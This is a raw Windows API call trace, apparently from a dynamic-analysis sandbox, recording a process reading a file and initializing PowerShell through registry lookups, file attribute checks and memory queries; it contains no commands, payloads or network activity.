	[0377.334] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.335] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.335] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.335] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.335] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.335] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.336] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.336] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.336] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.336] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.337] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.337] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.337] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.337] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.339] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.339] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.340] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.340] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.340] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.340] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.341] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.341] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.341] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1b4, lpOverlapped=0x0) returned 1
	[0377.341] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x0, lpOverlapped=0x0) returned 1
	[0377.341] CloseHandle (hObject=0x330) returned 1
	[0377.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0377.342] SetErrorMode (uMode=0x1) returned 0x1
	[0377.342] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d020 | out: lpFileInformation=0x24d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0377.342] SetErrorMode (uMode=0x1) returned 0x1
	[0377.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0377.342] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d108 | out: phkResult=0x24d108*=0x330) returned 0x0
	[0377.342] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d08c, lpData=0x0, lpcbData=0x24d088*=0x0 | out: lpType=0x24d08c*=0x1, lpData=0x0, lpcbData=0x24d088*=0x56) returned 0x0
	[0377.342] CoTaskMemAlloc (cb=0x5a) returned 0x1b77ab60
	[0377.342] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d05c, lpData=0x1b77ab60, lpcbData=0x24d058*=0x56 | out: lpType=0x24d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d058*=0x56) returned 0x0
	[0377.342] CoTaskMemFree (pv=0x1b77ab60) 
	[0377.342] RegCloseKey (hKey=0x330) returned 0x0
	[0377.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0377.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0378.111] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.619] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.620] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.620] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.620] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.620] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.620] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.622] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.631] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.631] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.632] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.633] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.634] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.634] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.637] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.637] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.644] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.650] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.650] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.650] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.650] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.651] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.651] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.651] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.651] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.652] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.652] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.652] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.652] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.652] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.654] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.656] VirtualQuery (in: lpAddress=0x24be00, lpBuffer=0x24ccc0, dwLength=0x30 | out: lpBuffer=0x24ccc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.656] VirtualQuery (in: lpAddress=0x24be00, lpBuffer=0x24ccc0, dwLength=0x30 | out: lpBuffer=0x24ccc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.656] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.657] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.124] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.125] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.125] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.134] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0379.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.134] CoTaskMemFree (pv=0x1b770e10) 
	[0379.142] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.148] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.149] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.151] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.152] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.154] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.154] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.155] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.156] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.157] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2a8 | out: phkResult=0x24d2a8*=0x330) returned 0x0
	[0379.157] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x24d2bc, lpData=0x0, lpcbData=0x24d2b8*=0x0 | out: lpType=0x24d2bc*=0x1, lpData=0x0, lpcbData=0x24d2b8*=0x74) returned 0x0
	[0379.157] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x24d22c, lpData=0x0, lpcbData=0x24d228*=0x0 | out: lpType=0x24d22c*=0x1, lpData=0x0, lpcbData=0x24d228*=0x74) returned 0x0
	[0379.157] CoTaskMemAlloc (cb=0x78) returned 0x101040
	[0379.157] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x24d1fc, lpData=0x101040, lpcbData=0x24d1f8*=0x74 | out: lpType=0x24d1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d1f8*=0x74) returned 0x0
	[0379.157] CoTaskMemFree (pv=0x101040) 
	[0379.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0379.157] SetErrorMode (uMode=0x1) returned 0x1
	[0379.157] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d180 | out: lpFileInformation=0x24d180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0379.157] SetErrorMode (uMode=0x1) returned 0x1
